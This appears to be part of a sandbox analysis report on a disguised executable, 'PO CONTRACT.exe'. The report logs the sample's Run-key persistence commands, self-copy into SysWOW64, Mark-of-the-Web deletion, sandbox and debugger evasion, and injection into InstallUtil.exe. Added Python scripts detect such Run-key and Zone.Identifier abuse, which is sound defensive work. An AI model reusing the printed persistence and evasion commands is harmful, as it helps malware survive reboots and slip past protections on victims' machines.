Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_08F57C10 push ecx; ret 0_2_08F57C22
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_08F5B6FC pushad ; ret 0_2_08F5B6FD
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_08FFA43D push FFFFFF8Bh; iretd 0_2_08FFA43F
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_08FF7C35 push ebx; retf 0_2_08FF7CF2
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_08FF2573 push ebx; ret 0_2_08FF2579
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_08FF7AED push eax; retf 0_2_08FF7C2D
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_013F6D72 push edx; ret 10_2_013F6D73
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056C68E8 pushad ; ret 10_2_056C68F1
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056C00BF push ebx; retf 10_2_056C00C2
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056C72C8 pushad ; retf 10_2_056C7381
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_09177420 push eax; ret 10_2_09177473
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_09176C7D push eax; ret 10_2_09176D86
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0917C8CC pushad ; retf 10_2_0917C8CD
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_09177B00 pushad ; ret 10_2_09177B13
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0917E3FB push ebx; ret 10_2_0917E401
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 11_2_02F99FE0 push esp; iretd 11_2_02F9A091

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | Executable created and started: C:\Windows\SysWOW64\SOA.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\SOA.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe

Boot Survival

Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SOA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GUIVTme
                    Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SOAJump to behavior
                    Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SOAJump to behavior
                    Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SOAJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GUIVTmeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GUIVTmeJump to behavior
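The two Run values above are the pattern a host-based check should catch: one written by reg.exe and pointing into C:\Windows\SysWOW64, the other written by InstallUtil.exe (a .NET framework tool that has no business creating autostart entries unless it is hosting injected code) and pointing into %APPDATA%. The Python below is an added example and not part of the Joe Sandbox report. It triages registry-set events and flags a Run value when its target lives in SysWOW64 or a user-profile directory, or when the writer is reg.exe or a .NET framework utility. The event field names follow Sysmon Event ID 13 (Image, TargetObject, Details) as an assumption, and the sample events are constructed to mirror the report's entries rather than taken from it.

```python
"""Triage Run-key autostart writes like the two in the report's Boot Survival
section. Added example; not Joe Sandbox code. Field names follow Sysmon
Event ID 13 (Image, TargetObject, Details) as an assumption; events below are
constructed to mirror the report, not taken from it."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class RegistrySetEvent:
    image: str           # process that wrote the value
    target_object: str   # key path including the value name
    details: str         # data written: the command that will autostart


# Only Run / RunOnce values are autostart entries.
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\", re.I)

# Locations a normal installer does not use for an autostart target. System32 is
# deliberately absent: Windows itself registers Run values there (for example
# SecurityHealthSystray.exe), so it would only produce noise.
SUSPICIOUS_TARGET_MARKERS = (
    "\\syswow64\\",                       # report: C:\Windows\SysWOW64\SOA.exe
    "\\appdata\\roaming\\", "%appdata%",  # report: ...\AppData\Roaming\GUIVTme\GUIVTme.exe
    "\\appdata\\local\\", "%localappdata%", "%temp%",
    "\\users\\public\\",
)

# Writers that should not be creating Run values: reg.exe driven from a script,
# and .NET framework utilities that only write registry keys when hijacked as
# an injection host (InstallUtil.exe in the report). Starting list, not exhaustive.
SUSPICIOUS_WRITERS = {"reg.exe", "installutil.exe", "regasm.exe", "regsvcs.exe"}


def value_name(target_object: str) -> str:
    return target_object.rsplit("\\", 1)[-1]


def extract_target_path(details: str) -> str:
    """Pull the executable path out of Run-value data.

    Quoted form: "C:\\Program Files\\x\\a.exe" /arg  -> C:\\Program Files\\x\\a.exe
    Bare form:   C:\\dir\\a.exe /arg                  -> C:\\dir\\a.exe
    An unquoted path containing spaces is ambiguous on Windows too; take
    everything up to the first '.exe' token as the best guess.
    """
    d = details.strip()
    if d.startswith('"'):
        end = d.find('"', 1)
        return d[1:end] if end > 0 else d[1:]
    m = re.match(r"(.+?\.exe)(?:\s|$)", d, re.I)
    return m.group(1) if m else d.split(" ", 1)[0]


def triage(event: RegistrySetEvent) -> list[str]:
    """Return the reasons an autostart write is suspicious (empty = not flagged)."""
    if not RUN_KEY_RE.search(event.target_object):
        return []
    reasons = []
    target = extract_target_path(event.details).lower()
    if any(marker in target for marker in SUSPICIOUS_TARGET_MARKERS):
        reasons.append(f"Run value '{value_name(event.target_object)}' starts {target}")
    writer = event.image.rsplit("\\", 1)[-1].lower()
    if writer in SUSPICIOUS_WRITERS:
        reasons.append(f"written by {writer}")
    return reasons


def flag_run_keys(events) -> dict[str, list[str]]:
    """Map each flagged Run value name to its reasons."""
    out = {}
    for e in events:
        reasons = triage(e)
        if reasons:
            out[value_name(e.target_object)] = reasons
    return out


SAMPLE_EVENTS = [  # constructed to mirror the report; not sandbox output
    RegistrySetEvent(r"C:\Windows\SysWOW64\reg.exe",
                     r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SOA",
                     r"C:\Windows\SysWOW64\SOA.exe"),
    RegistrySetEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
                     r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GUIVTme",
                     r'"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"'),
    RegistrySetEvent(r"C:\Program Files\Vendor\setup.exe",  # benign control
                     r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray",
                     r'"C:\Program Files\Vendor\tray.exe" /background'),
    RegistrySetEvent(r"C:\Windows\SysWOW64\reg.exe",  # reg.exe, but not an autostart key
                     r"HKCU\SOFTWARE\Vendor\Setting", "1"),
]

if __name__ == "__main__":
    for name, reasons in flag_run_keys(SAMPLE_EVENTS).items():
        print(name, "->", "; ".join(reasons))
```

Both report entries are flagged on two independent grounds (target location and writer), while the benign control entry and the non-autostart reg.exe write pass through; in a real pipeline the writer check is the higher-confidence signal, since installers that legitimately drop into AppData exist but reg.exe and InstallUtil.exe writing HKCU\...\Run almost never does.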

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\PO CONTRACT.exe | File opened: C:\Users\user\Desktop\PO CONTRACT.exe\:Zone.Identifier (access: read attributes | delete)
Source: C:\Windows\SysWOW64\SOA.exe | File opened: C:\Windows\SysWOW64\SOA.exe\:Zone.Identifier (access: read attributes | delete)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe:Zone.Identifier (access: read attributes | delete)
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Process information set: NOOPENFILEERRORBOX (reported 47 times)
Source: C:\Windows\SysWOW64\SOA.exe | Process information set: NOOPENFILEERRORBOX (reported 47 times)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process information set: NOOPENFILEERRORBOX (reported 47 times)
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Process information set: NOOPENFILEERRORBOX (reported 42 times)
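The Zone.Identifier entries at the top of this section are the Mark of the Web being erased: PO CONTRACT.exe and SOA.exe each open the alternate data stream on their own image with delete access, and InstallUtil.exe does the same to the GUIVTme.exe it has just dropped. That stream is what SmartScreen and Office Protected View consult to treat a file as an Internet download, so removing it before the next stage runs is the "hides that the sample has been downloaded" signature in the overview. The Python below is an added example and not part of the Joe Sandbox report. It shows what the stream normally contains (a constructed ZoneTransfer block) and triages file-open events for delete access on that stream, singling out a process un-marking its own executable. The event shape and field names are assumptions; the sample events are constructed to mirror the report.

```python
"""Mark-of-the-Web (Zone.Identifier) removal, as seen in the report: each stage
opens '<its own exe>:Zone.Identifier' with delete access. Added example, not
Joe Sandbox code; events and stream content below are constructed."""
import re
from dataclasses import dataclass

# URL security zone ids as stored in ZoneTransfer/ZoneId.
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}


def parse_zone_identifier(stream_text: str) -> dict:
    """Parse the INI-style body of a Zone.Identifier stream.

    Browsers and mail clients write '[ZoneTransfer]' with ZoneId (3 = Internet)
    and, on recent Windows, ReferrerUrl / HostUrl. Unknown keys are ignored.
    """
    section, fields = None, {}
    for raw in stream_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "zonetransfer" and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    zone_id = int(fields["zoneid"]) if fields.get("zoneid", "").isdigit() else None
    return {"zone_id": zone_id, "zone_name": ZONE_NAMES.get(zone_id, "unknown"),
            "referrer_url": fields.get("referrerurl"), "host_url": fields.get("hosturl")}


@dataclass(frozen=True)
class FileOpenEvent:
    image: str   # process opening the handle
    path: str    # may carry an ADS suffix such as ':Zone.Identifier'
    access: str  # rights as logged, e.g. 'read attributes | delete'


# The report renders the stream both as 'exe:Zone.Identifier' and 'exe\:Zone.Identifier';
# accept both, plus an explicit :$DATA type suffix.
MOTW_RE = re.compile(r"^(?P<file>.+?)\\?:Zone\.Identifier(?::\$DATA)?$", re.I)


def triage_motw_removal(event: FileOpenEvent):
    """Return a finding if the event deletes a Zone.Identifier stream, else None.

    DeleteFileW('file:Zone.Identifier') opens just that stream with DELETE
    access and removes it, leaving the file itself intact: exactly the
    'read attributes | delete' pattern in the report. Reading the stream is
    routine (Explorer, AV, SmartScreen) and is not flagged.
    """
    m = MOTW_RE.match(event.path)
    if not m:
        return None
    rights = {r.strip().lower() for r in event.access.split("|")}
    if "delete" not in rights:
        return None
    file = m.group("file")
    return {"file": file, "by": event.image,
            "self_unmark": file.lower() == event.image.lower(),  # process un-marking its own image
            "dropped_exe": file.lower().endswith(".exe")}


def flag_motw_removals(events) -> list:
    return [hit for hit in (triage_motw_removal(e) for e in events) if hit]


# Constructed: what a mail-client download's stream typically looks like.
SAMPLE_STREAM = ("[ZoneTransfer]\r\nZoneId=3\r\n"
                 "ReferrerUrl=https://mail.example.test/\r\n"
                 "HostUrl=https://mail.example.test/attachment/PO%20CONTRACT.exe\r\n")

SAMPLE_EVENTS = [  # constructed to mirror the report; not sandbox output
    FileOpenEvent(r"C:\Users\user\Desktop\PO CONTRACT.exe",
                  r"C:\Users\user\Desktop\PO CONTRACT.exe:Zone.Identifier",
                  "read attributes | delete"),
    FileOpenEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
                  r"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe:Zone.Identifier",
                  "read attributes | delete"),
    FileOpenEvent(r"C:\Windows\explorer.exe",  # benign: Explorer reading the mark
                  r"C:\Users\user\Desktop\PO CONTRACT.exe:Zone.Identifier",
                  "read attributes | read data"),
    FileOpenEvent(r"C:\Users\user\Desktop\PO CONTRACT.exe",  # main stream, not the ADS
                  r"C:\Users\user\Desktop\PO CONTRACT.exe", "read data"),
]

if __name__ == "__main__":
    print(parse_zone_identifier(SAMPLE_STREAM))
    for hit in flag_motw_removals(SAMPLE_EVENTS):
        print(hit)
```

The self_unmark flag is the one worth alerting on with little further context: legitimate software has no reason to strip the mark from its own running image, whereas delete access on a stream by an archiver or installer unpacking files is common enough to need the dropped_exe qualifier before it is escalated.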

Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: PO CONTRACT.exe PID: 4388, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SOA.exe PID: 7300, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: OutputDebugStringW count: 1941
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 36 (reported 2 times)
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 43 (reported 4 times)
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Memory allocated: 2D20000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Memory allocated: 2ED0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Memory allocated: 4ED0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Memory allocated: 56D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Memory allocated: 66D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Memory allocated: 6AE0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Memory allocated: 7AE0000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\SOA.exe | Memory allocated: 13F0000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\SOA.exe | Memory allocated: 2EB0000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\SOA.exe | Memory allocated: 4EB0000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\SOA.exe | Memory allocated: 56D0000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\SOA.exe | Memory allocated: 66D0000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\SOA.exe | Memory allocated: 6AE0000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\SOA.exe | Memory allocated: 7AE0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 2F90000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 30E0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 50E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: 2750000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: 2960000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: 4960000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: E20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: 2870000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: 2660000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\SOA.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Thread delayed: delay time: 922337203685477 (reported 2 times)
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Window / User API: threadDelayed 796
Source: C:\Windows\SysWOW64\SOA.exe | Window / User API: threadDelayed 371
Source: C:\Windows\SysWOW64\SOA.exe | Window / User API: threadDelayed 792
Source: C:\Windows\SysWOW64\SOA.exe | Window / User API: threadDelayed 8612
Source: C:\Users\user\Desktop\PO CONTRACT.exe TID: 7044 | Thread sleep time: -45000s >= -30000s
Source: C:\Users\user\Desktop\PO CONTRACT.exe TID: 596 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\Desktop\PO CONTRACT.exe TID: 596 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\PING.EXE TID: 7656 | Thread sleep count: 34 > 30
Source: C:\Windows\SysWOW64\PING.EXE TID: 7656 | Thread sleep time: -34000s >= -30000s
Source: C:\Windows\SysWOW64\PING.EXE TID: 7524 | Thread sleep count: 41 > 30
Source: C:\Windows\SysWOW64\PING.EXE TID: 7524 | Thread sleep time: -41000s >= -30000s
Source: C:\Windows\SysWOW64\PING.EXE TID: 7724 | Thread sleep count: 41 > 30
Source: C:\Windows\SysWOW64\PING.EXE TID: 7724 | Thread sleep time: -41000s >= -30000s
Source: C:\Windows\SysWOW64\SOA.exe TID: 7224 | Thread sleep time: -371000s >= -30000s
Source: C:\Windows\SysWOW64\SOA.exe TID: 3536 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\SOA.exe TID: 3536 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\SOA.exe TID: 7224 | Thread sleep time: -8612000s >= -30000s
Source: C:\Windows\SysWOW64\SOA.exe TID: 6048 | Thread sleep time: -50000s >= -30000s
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe TID: 1600 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe TID: 7656 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\SOA.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\SOA.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: PO CONTRACT.exe, 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, PO CONTRACT.exe, 00000000.00000002.36011026094.0000000006900000.00000004.08000000.00040000.00000000.sdmp, PO CONTRACT.exe, 00000000.00000002.36008654605.00000000059D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                    Source: PO CONTRACT.exe, 00000000.00000002.36008654605.00000000059D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 806010189GSOFTWARE\VMware, Inc.\VMware VGAuth
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_05453070 CheckRemoteDebuggerPresent, 0_2_05453070
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\SOA.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\SOA.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\SOA.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\SOA.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Windows\SysWOW64\SOA.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Windows\SysWOW64\SOA.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000
Source: C:\Windows\SysWOW64\SOA.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000
Source: C:\Windows\SysWOW64\SOA.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: FA5008
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 43 > nul && copy "C:\Users\user\Desktop\PO CONTRACT.exe" "C:\Windows\SysWOW64\SOA.exe" && ping 127.0.0.1 -n 43 > nul && "C:\Windows\SysWOW64\SOA.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 36
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 43
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 43
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\SOA.exe "C:\Windows\SysWOW64\SOA.exe"
Source: C:\Windows\SysWOW64\SOA.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Queries volume information: C:\Users\user\Desktop\PO CONTRACT.exe VolumeInformation
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\SOA.exe | Queries volume information: C:\Windows\SysWOW64\SOA.exe VolumeInformation
Source: C:\Windows\SysWOW64\SOA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\SOA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\SOA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\SOA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Queries volume information: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Queries volume information: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe VolumeInformation
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

Source: Yara match | File source: 0.2.PO CONTRACT.exe.4044ef2.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.401c15a.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.3fe0f9a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.5747378.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.3fceb62.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.3fa5dca.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.4009d32.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.3fe0f9a.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.401c15a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.570c1d8.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.4044ef2.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.570c1d8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.4009d32.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.3fa5dca.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.5747378.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
